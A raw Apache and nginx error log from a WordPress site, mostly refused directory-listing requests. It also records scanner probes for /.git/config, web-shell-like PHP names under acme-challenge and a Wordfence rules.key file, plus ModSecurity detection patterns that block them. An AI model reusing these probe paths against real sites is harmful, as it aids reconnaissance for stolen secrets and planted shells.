(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:06.975362 2024] [autoindex:error] [pid 7844:tid 140220599031552] [client 74.234.93.101:51498] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/light/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.038981 2024] [autoindex:error] [pid 7844:tid 140220640995072] [client 74.234.93.101:51500] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.112897 2024] [autoindex:error] [pid 7843:tid 140220632602368] [client 74.234.93.101:51502] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.176510 2024] [autoindex:error] [pid 7845:tid 140220674565888] [client 74.234.93.101:51504] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.239879 2024] [autoindex:error] [pid 8731:tid 140220582246144] [client 74.234.93.101:51506] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.303554 2024] [autoindex:error] [pid 8731:tid 140220557068032] [client 74.234.93.101:51508] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.367383 2024] [autoindex:error] [pid 7845:tid 140220682958592] [client 74.234.93.101:51510] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.431182 2024] [autoindex:error] [pid 7845:tid 140220657780480] [client 74.234.93.101:51512] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:07.494971 2024] [autoindex:error] [pid 7844:tid 140220624209664] [client 74.234.93.101:51514] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:13.367040 2024] [autoindex:error] [pid 7844:tid 140220649387776] [client 74.234.93.101:51524] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:13.430110 2024] [autoindex:error] [pid 7843:tid 140220582246144] [client 74.234.93.101:51526] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.217635 2024] [autoindex:error] [pid 7844:tid 140220615816960] [client 74.234.93.101:51530] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.281628 2024] [autoindex:error] [pid 7844:tid 140220691351296] [client 74.234.93.101:51532] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.345802 2024] [autoindex:error] [pid 8731:tid 140220733314816] [client 74.234.93.101:51534] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.409574 2024] [autoindex:error] [pid 7844:tid 140220708136704] [client 74.234.93.101:51536] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/wlw/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.473002 2024] [autoindex:error] [pid 8731:tid 140220657780480] [client 74.234.93.101:51538] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.536183 2024] [autoindex:error] [pid 7843:tid 140220691351296] [client 74.234.93.101:51540] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.599433 2024] [autoindex:error] [pid 7843:tid 140220741707520] [client 74.234.93.101:51542] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.663101 2024] [autoindex:error] [pid 7845:tid 140220582246144] [client 74.234.93.101:51544] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:14.726946 2024] [autoindex:error] [pid 7843:tid 140220682958592] [client 74.234.93.101:51546] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/providers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Feb 11 08:45:44.401205 2024] [autoindex:error] [pid 8731:tid 140220548675328] [client 74.234.93.101:51628] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Feb 12 15:59:43.711657 2024] [autoindex:error] [pid 11257:tid 139848698492672] [client 103.42.59.121:54940] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php 2024/02/12 20:05:27 [error] 11211#11211: *411831 access forbidden by rule, client: 54.75.17.244, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Feb 13 08:14:38.174167 2024] [:error] [pid 19948:tid 140511490844416] [client 173.249.52.122:41888] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/Newsupway.php, referer: www.google.com [Wed Feb 14 05:30:19.791791 2024] [autoindex:error] [pid 5742:tid 140609679472384] [client 45.141.215.86:58912] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Feb 14 13:39:13.466832 2024] [autoindex:error] [pid 6362:tid 140609603938048] [client 24.144.89.143:38472] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Feb 16 19:50:26.819379 2024] [autoindex:error] [pid 30306:tid 140318502504192] [client 85.215.108.163:60514] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 16 19:50:27.958306 2024] [autoindex:error] [pid 30305:tid 140318502504192] [client 85.215.108.163:60516] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 16 19:50:30.817058 2024] [autoindex:error] [pid 30514:tid 140318460540672] [client 85.215.108.163:60520] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 16 19:50:32.007717 2024] [autoindex:error] [pid 30305:tid 140318594823936] [client 85.215.108.163:60522] AH01276: Cannot serve directory /home/investig/public_html/wp-content/plugins/woocommerce/includes/shortcodes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 16 19:52:21.059305 2024] [autoindex:error] [pid 30306:tid 140318536075008] [client 85.215.108.163:60576] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 16 20:42:48.555318 2024] [autoindex:error] [pid 30302:tid 140318410184448] [client 85.215.108.163:32982] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Feb 17 10:18:19.943661 2024] [:error] [pid 1419:tid 140640030799616] [client 74.84.150.86:44770] [client 74.84.150.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:user-agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "User-Agent"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZdDOO7YBkdxsXOwO6oLEFwAAAME"] [Sat Feb 17 11:26:08.730225 2024] [autoindex:error] [pid 762:tid 140639844923136] [client 146.190.54.115:45446] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Feb 18 00:24:56.959567 2024] [:error] [pid 761:tid 140639853315840] [client 135.125.205.117:53660] [client 135.125.205.117] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key"] [unique_id "ZdGUqEB-C8IOqy9Ev20yswAAAE4"], referer: investigacionperu.com 2024/02/19 10:07:43 [error] 26686#26686: *491728 access forbidden by rule, client: 3.15.165.182, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com." 2024/02/19 10:07:43 [error] 26685#26685: *491729 access forbidden by rule, client: 3.15.165.182, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Feb 19 16:53:35.655100 2024] [:error] [pid 27674:tid 139677813614336] [client 173.239.214.81:54790] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Feb 19 16:54:04.743272 2024] [:error] [pid 26823:tid 139677654816512] [client 173.239.214.118:54854] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 20 22:51:29.933438 2024] [:error] [pid 14414:tid 139630326216448] [client 91.134.113.82:52218] [client 91.134.113.82] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key"] [unique_id "ZdVzQZ3n07rGHoeqMoAINAAAAJg"], referer: investigacionperu.com [Wed Feb 21 06:30:27.118816 2024] [autoindex:error] [pid 3407:tid 139960157955840] [client 41.216.188.92:59272] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Feb 21 10:22:11.171965 2024] [autoindex:error] [pid 3405:tid 139960057243392] [client 203.242.143.120:34134] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:22:22.573911 2024] [:error] [pid 3406:tid 139960316794624] [client 203.242.143.120:34140] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: investigacionperu.com [Wed Feb 21 10:22:22.574196 2024] [:error] [pid 3406:tid 139960316794624] [client 203.242.143.120:34140] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: investigacionperu.com [Wed Feb 21 10:22:22.574392 2024] [:error] [pid 3406:tid 139960316794624] [client 203.242.143.120:34140] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: investigacionperu.com [Wed Feb 21 10:22:22.574633 2024] [:error] [pid 3406:tid 139960316794624] [client 203.242.143.120:34140] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: investigacionperu.com [Wed Feb 21 10:22:43.449702 2024] [:error] [pid 4053:tid 139960124385024] [client 203.242.143.120:34148] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: investigacionperu.com [Wed Feb 21 10:22:43.645185 2024] [autoindex:error] [pid 3405:tid 139960174741248] [client 74.208.85.87:34152] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:22:46.960112 2024] [autoindex:error] [pid 4053:tid 139960174741248] [client 134.209.228.47:34158] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:22:59.185278 2024] [:error] [pid 3407:tid 139960065636096] [client 167.114.26.66:34168] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php, referer: investigacionperu.com [Wed Feb 21 10:23:19.661120 2024] [:error] [pid 3406:tid 139960124385024] [client 203.242.143.120:34186] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: investigacionperu.com [Wed Feb 21 10:23:39.300413 2024] [autoindex:error] [pid 3405:tid 139960166348544] [client 165.22.220.140:34210] AH01276: Cannot serve directory /home/investig/public_html/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:23:44.440847 2024] [autoindex:error] [pid 3405:tid 139960065636096] [client 3.128.115.212:34216] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:24:03.955558 2024] [autoindex:error] [pid 3405:tid 139960124385024] [client 74.208.85.87:34244] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:24:18.028179 2024] [autoindex:error] [pid 4053:tid 139960074028800] [client 74.208.85.87:34300] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:26:13.318915 2024] [:error] [pid 3405:tid 139960191526656] [client 167.114.26.66:34366] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/2index.php, referer: investigacionperu.com [Wed Feb 21 10:27:34.903873 2024] [autoindex:error] [pid 4053:tid 139960199919360] [client 74.208.85.87:34408] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:28:42.896726 2024] [:error] [pid 4053:tid 139960074028800] [client 3.128.115.212:34436] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php, referer: investigacionperu.com [Wed Feb 21 10:30:48.712700 2024] [autoindex:error] [pid 3407:tid 139960333580032] [client 3.128.115.212:34456] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 10:54:20.159398 2024] [autoindex:error] [pid 3405:tid 139960174741248] [client 94.101.214.98:34684] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/query-pagination-numbers/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 11:04:23.134033 2024] [autoindex:error] [pid 4053:tid 139960074028800] [client 94.101.214.98:34786] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/html/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Wed Feb 21 21:04:45.748505 2024] [:error] [pid 4053:tid 139960157955840] [client 66.36.234.130:45412] [client 66.36.234.130] 